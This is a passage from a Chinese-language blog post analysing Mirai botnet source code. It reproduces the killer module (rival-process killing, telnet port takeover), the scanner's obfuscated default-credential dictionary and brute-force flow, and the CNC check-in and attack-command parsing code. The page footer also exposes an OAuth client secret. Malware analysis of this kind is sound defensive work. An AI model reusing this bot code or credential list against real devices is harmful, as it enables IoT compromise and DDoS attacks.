restarting</span></span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> KILLER_REBIND_TELNET</span></span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> DEBUG</span></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[killer] Trying to kill port 23\n&quot;</span>);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">    <span class="keyword">if</span> (killer_kill_by_port(htons(<span class="number">23</span>)))</span><br><span class="line">    &#123;</span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> DEBUG</span></span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;[killer] Killed tcp/23 (telnet)\n&quot;</span>);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> DEBUG</span></span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;[killer] Failed to kill port 23\n&quot;</span>);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">    &#125;</span><br><span class="line">    tmp_bind_addr.sin_port = htons(<span class="number">23</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> ((tmp_bind_fd = socket(AF_INET, SOCK_STREAM, <span class="number">0</span>)) != <span class="number">-1</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        bind(tmp_bind_fd, (<span class="keyword">struct</span> sockaddr *)&amp;tmp_bind_addr, <span class="keyword">sizeof</span> (<span class="keyword">struct</span> sockaddr_in));</span><br><span class="line">        listen(tmp_bind_fd, <span class="number">1</span>);</span><br><span class="line">    &#125;</span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> DEBUG</span></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[killer] Bound to tcp/23 (telnet)\n&quot;</span>);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br></pre></td></tr></table></figure>
<p>调用<code>has_exe_access</code>函数检查是否有目录<code>/proc</code>权限，主要通过<code>open</code>打开文件夹来检查</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">    <span class="keyword">if</span> (!has_exe_access())</span><br><span class="line">    &#123;</span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> DEBUG</span></span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;[killer] Machine does not have /proc/$pid/exe\n&quot;</span>);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p>进入循环，判断<code>/proc/</code>下的进程目录：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">while</span> ((file = readdir(dir)) != <span class="literal">NULL</span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="comment">// skip all folders that are not PIDs</span></span><br><span class="line">    <span class="keyword">if</span> (*(file-&gt;d_name) &lt; <span class="string">&#x27;0&#x27;</span> || *(file-&gt;d_name) &gt; <span class="string">&#x27;9&#x27;</span>)</span><br><span class="line">        <span class="keyword">continue</span>;</span><br></pre></td></tr></table></figure>
<p>读取<code>/proc/pid/exe</code>获取到被扫描进程的路径，如果找到同类恶意程序<code>anime</code>，则删除对应文件并杀掉进程。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">table_unlock_val(TABLE_KILLER_ANIME);</span><br><span class="line"> <span class="comment">// If path contains &quot;.anime&quot; kill.</span></span><br><span class="line"> <span class="keyword">if</span> (util_stristr(realpath, rp_len - <span class="number">1</span>, table_retrieve_val(TABLE_KILLER_ANIME, <span class="literal">NULL</span>)) != <span class="number">-1</span>)</span><br><span class="line"> &#123;</span><br><span class="line">     unlink(realpath);</span><br><span class="line">     kill(pid, <span class="number">9</span>);</span><br><span class="line"> &#125;</span><br><span class="line"> table_lock_val(TABLE_KILLER_ANIME);</span><br></pre></td></tr></table></figure>
<p>同样通过<code>/proc/pid/exe</code>获取到进程对应的可执行文件，对其进行扫描，如果其中包含如下的字符串则杀死对应的进程：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">REPORT %s:%s</span><br><span class="line">HTTPFLOOD</span><br><span class="line">LOLNOGTFO</span><br><span class="line">\x58\x4D\x4E\x4E\x43\x50\x46\x22</span><br><span class="line">zollard</span><br></pre></td></tr></table></figure>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">            <span class="keyword">if</span> (memory_scan_match(exe_path))</span><br><span class="line">            &#123;</span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> DEBUG</span></span><br><span class="line">                <span class="built_in">printf</span>(<span class="string">&quot;[killer] Memory scan match for binary %s\n&quot;</span>, exe_path);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">                kill(pid, <span class="number">9</span>);</span><br><span class="line">            &#125; </span><br></pre></td></tr></table></figure>
<p><code>memory_scan_match</code>中，则是先通过只读获取到进程的可执行文件的文件描述符<code>fd</code>，然后调用<code>mem_exists</code>函数对其进行检查。<code>mem_exists</code>的机制就是读取到缓冲区，然后判断缓冲区中是否包含制定长度的数据。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">while</span> ((ret = read(fd, rdbuf, <span class="keyword">sizeof</span> (rdbuf))) &gt; <span class="number">0</span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">if</span> (mem_exists(rdbuf, ret, m_qbot_report, m_qbot_len) ||</span><br><span class="line">        mem_exists(rdbuf, ret, m_qbot_http, m_qbot2_len) ||</span><br><span class="line">        mem_exists(rdbuf, ret, m_qbot_dup, m_qbot3_len) ||</span><br><span class="line">        mem_exists(rdbuf, ret, m_upx_str, m_upx_len) ||</span><br><span class="line">        mem_exists(rdbuf, ret, m_zollard, m_zollard_len))</span><br><span class="line">    &#123;</span><br><span class="line">        found = TRUE;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>至此，killer模块大致分析完毕。</p>
<h2 id="scanner模块"><a href="#scanner模块" class="headerlink" title="scanner模块"></a>scanner模块</h2><p>scanner模块只有当bot不处于debug编译模式，才会执行。该模块的代码大多手动通过网络编程实现了TCP网络通信例如三次握手、Telnet登陆等，就不做太多代码的分析，而是主要说一下代码的执行流程。</p>
<ol>
<li>初始化socket</li>
<li>初始化IPv4协议头部，初始化TCP协议头部，其中TCP协议头部的端口是随机获取到一个小于1024的端口</li>
<li>硬编码的、已加密的Telnet字典。每一条弱口令都是使用函数<code>add_auth_entry</code>函数进行添加的。<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Set up passwords</span></span><br><span class="line">add_auth_entry(<span class="string">&quot;\x50\x4D\x4D\x56&quot;</span>, <span class="string">&quot;\x5A\x41\x11\x17\x13\x13&quot;</span>, <span class="number">10</span>);                     <span class="comment">// root     xc3511</span></span><br><span class="line">add_auth_entry(<span class="string">&quot;\x50\x4D\x4D\x56&quot;</span>, <span class="string">&quot;\x54\x4B\x58\x5A\x54&quot;</span>, <span class="number">9</span>);                          <span class="comment">// root     vizxv</span></span><br><span class="line">add_auth_entry(<span class="string">&quot;\x50\x4D\x4D\x56&quot;</span>, <span class="string">&quot;\x43\x46\x4F\x4B\x4C&quot;</span>, <span class="number">8</span>);                          <span class="comment">// root     admin</span></span><br><span class="line">add_auth_entry(<span class="string">&quot;\x43\x46\x4F\x4B\x4C&quot;</span>, <span class="string">&quot;\x43\x46\x4F\x4B\x4C&quot;</span>, <span class="number">7</span>);                      <span class="comment">// admin    admin</span></span><br><span class="line">add_auth_entry(<span class="string">&quot;\x50\x4D\x4D\x56&quot;</span>, <span class="string">&quot;\x1A\x1A\x1A\x1A\x1A\x1A&quot;</span>, <span class="number">6</span>);                      <span class="comment">// root     888888</span></span><br><span class="line">add_auth_entry(<span class="string">&quot;\x50\x4D\x4D\x56&quot;</span>, <span class="string">&quot;\x5A\x4F\x4A\x46\x4B\x52\x41&quot;</span>, <span class="number">5</span>);                  <span class="comment">// root     xmhdipc</span></span><br><span class="line">add_auth_entry(<span class="string">&quot;\x50\x4D\x4D\x56&quot;</span>, <span class="string">&quot;\x46\x47\x44\x43\x57\x4E\x56&quot;</span>, <span class="number">5</span>);                  <span class="comment">// root     default</span></span><br><span class="line">add_auth_entry(<span class="string">&quot;\x50\x4D\x4D\x56&quot;</span>, <span class="string">&quot;\x48\x57\x43\x4C\x56\x47\x41\x4A&quot;</span>, <span class="number">5</span>);              <span class="comment">// root     juantech</span></span><br><span class="line">add_auth_entry(<span class="string">&quot;\x50\x4D\x4D\x56&quot;</span>, <span class="string">&quot;\x13\x10\x11\x16\x17\x14&quot;</span>, <span class="number">5</span>);                      <span class="comment">// root     123456</span></span><br><span class="line">add_auth_entry(<span class="string">&quot;\x50\x4D\x4D\x56&quot;</span>, <span class="string">&quot;\x17\x16\x11\x10\x13&quot;</span>, <span class="number">5</span>);                          <span class="comment">// root     54321</span></span><br><span class="line">......</span><br></pre></td></tr></table></figure></li>
<li>进入主循环中，开始真正的扫描操作<ol>
<li>向目标的2323端口或者22端口发送SYN包，这一步应该是进行资产的探测</li>
<li>读取SYN+ACK包，进而建立TCP连接</li>
<li>如果TCP连接建立成功，则尝试使用弱口令进行登陆</li>
<li>然后应该是建立了一个Telnet登陆的自动机，来根据不同的返回状态来进行弱口令的登陆爆破<br>在scanner模块中，bot主要是做了手动的TCP连接实现，加载静态编码的弱口令字典，并创建了一个自动机来实现对模板设备的自动化Telnet爆破。在实际的分析过程中，对scanner模块中的弱口令字典的提取应该才是比较重要的，网络通信行为知道大概功能应该就差不多了。</li>
</ol>
</li>
</ol>
<h2 id="CNC通信"><a href="#CNC通信" class="headerlink" title="CNC通信"></a>CNC通信</h2><p>当初始化完毕attack、killer、scanner三个模块后，bot进入死循环，和CNC建立通信，并获取CNC的攻击指令下发。<br>根据<code>pending_connection</code>标志，与CNC尝试建立连接。如果连接成功，会向CNC发送<code>\x00\x00\x00\x01</code>，应该是心跳包，或者上线包。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line">        <span class="keyword">if</span> (pending_connection)</span><br><span class="line">        &#123;</span><br><span class="line">            pending_connection = FALSE;</span><br><span class="line">            <span class="comment">// 与CNC连接超时</span></span><br><span class="line">            <span class="keyword">if</span> (!FD_ISSET(fd_serv, &amp;fdsetwr))</span><br><span class="line">            &#123;</span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> DEBUG</span></span><br><span class="line">                <span class="built_in">printf</span>(<span class="string">&quot;[main] Timed out while connecting to CNC\n&quot;</span>);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">                teardown_connection();</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">else</span></span><br><span class="line">            &#123;</span><br><span class="line">                <span class="type">int</span> err = <span class="number">0</span>;</span><br><span class="line">                <span class="type">socklen_t</span> err_len = <span class="keyword">sizeof</span> (err);</span><br><span class="line"></span><br><span class="line">                getsockopt(fd_serv, SOL_SOCKET, SO_ERROR, &amp;err, &amp;err_len);</span><br><span class="line">                <span class="keyword">if</span> (err != <span class="number">0</span>)</span><br><span class="line">                &#123;</span><br><span class="line">                <span class="comment">// 其他与CNC连接的错误</span></span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> DEBUG</span></span><br><span class="line">                    <span class="built_in">printf</span>(<span class="string">&quot;[main] Error while connecting to CNC code=%d\n&quot;</span>, err);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">                    close(fd_serv);</span><br><span class="line">                    fd_serv = <span class="number">-1</span>;</span><br><span class="line">                    sleep((rand_next() % <span class="number">10</span>) + <span class="number">1</span>);</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="keyword">else</span></span><br><span class="line">                &#123;</span><br><span class="line">                    <span class="comment">// 与CNC连接成功</span></span><br><span class="line">                    <span class="type">uint8_t</span> id_len = util_strlen(id_buf);</span><br><span class="line"></span><br><span class="line">                    LOCAL_ADDR = util_local_addr();</span><br><span class="line">                    send(fd_serv, <span class="string">&quot;\x00\x00\x00\x01&quot;</span>, <span class="number">4</span>, MSG_NOSIGNAL);</span><br><span class="line">                    send(fd_serv, &amp;id_len, <span class="keyword">sizeof</span> (id_len), MSG_NOSIGNAL);</span><br><span class="line">                    <span class="keyword">if</span> (id_len &gt; <span class="number">0</span>)</span><br><span class="line">                    &#123;</span><br><span class="line">                        send(fd_serv, id_buf, id_len, MSG_NOSIGNAL);</span><br><span class="line">                    &#125;</span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> DEBUG</span></span><br><span class="line">                    <span class="built_in">printf</span>(<span class="string">&quot;[main] Connected to CNC. Local address = %d\n&quot;</span>, LOCAL_ADDR);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br></pre></td></tr></table></figure>
<p>最后bot会尝试从CNC的连接中读取数据，并使用函数<code>attack_parse</code>来解析下发的攻击指令。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">            <span class="comment">// Actually read buffer length and buffer data</span></span><br><span class="line">            recv(fd_serv, &amp;len, <span class="keyword">sizeof</span> (len), MSG_NOSIGNAL);</span><br><span class="line">            len = ntohs(len);</span><br><span class="line">            recv(fd_serv, rdbuf, len, MSG_NOSIGNAL);</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> DEBUG</span></span><br><span class="line">            <span class="built_in">printf</span>(<span class="string">&quot;[main] Received %d bytes from CNC\n&quot;</span>, len);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> (len &gt; <span class="number">0</span>)</span><br><span class="line">                attack_parse(rdbuf, len);</span><br></pre></td></tr></table></figure>
<p>在<code>attack_parse</code>函数中，会解析CNC下发的指令，从中得到DOS持续时间、攻击编号、被攻击目标数量、被攻击目标列表、攻击参数等等。具体的攻击方式也是和TCP编程相关，此处分析暂时忽略。</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/mirai/" rel="tag"># mirai</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/12/23/mirai%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90%EF%BC%9A%E5%AE%9E%E6%88%98%E7%9C%9F%E5%AE%9Emirai%E6%A0%B7%E6%9C%AC1-%E6%9C%89%E7%AC%A6%E5%8F%B7/" rel="prev" title="mirai源码分析：实战真实mirai样本1-有符号">
      <i class="fa fa-chevron-left"></i> mirai源码分析：实战真实mirai样本1-有符号
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/12/29/FirmAE%E5%88%9B%E5%BB%BAqemu%E9%95%9C%E5%83%8F%E5%B9%B6%E6%89%A7%E8%A1%8C%E7%9A%84%E8%BF%87%E7%A8%8B/" rel="next" title="FirmAE创建qemu镜像并执行的过程">
      FirmAE创建qemu镜像并执行的过程 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="gitalk-container"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%BF%90%E8%A1%8C%E5%88%9D%E5%A7%8B%E5%8C%96"><span class="nav-number">1.</span> <span class="nav-text">运行初始化</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#attack%E6%A8%A1%E5%9D%97"><span class="nav-number">2.</span> <span class="nav-text">attack模块</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#killer%E6%A8%A1%E5%9D%97"><span class="nav-number">3.</span> <span class="nav-text">killer模块</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#scanner%E6%A8%A1%E5%9D%97"><span class="nav-number">4.</span> <span class="nav-text">scanner模块</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CNC%E9%80%9A%E4%BF%A1"><span class="nav-number">5.</span> <span class="nav-text">CNC通信</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">OneShell</p>
  <div class="site-description" itemprop="description">菜</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">40</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">14</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">12</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">OneShell</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.css">

<script>
NexT.utils.loadComments(document.querySelector('#gitalk-container'), () => {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js', () => {
    var gitalk = new Gitalk({
      clientID    : 'd364449d44c374dab007',
      clientSecret: 'bb821aa84a81e3bd904d059c6e9ec7eb0e1cab4f',
      repo        : 'BlogComments',
      owner       : 'NoneShell',
      admin       : ['NoneShell'],
      id          : '45a74426b0e20f44d0b3480c6f679225',
        language: 'zh-CN',
      distractionFreeMode: true
    });
    gitalk.render('gitalk-container');
  }, window.Gitalk);
});
</script>

</body>
</html>
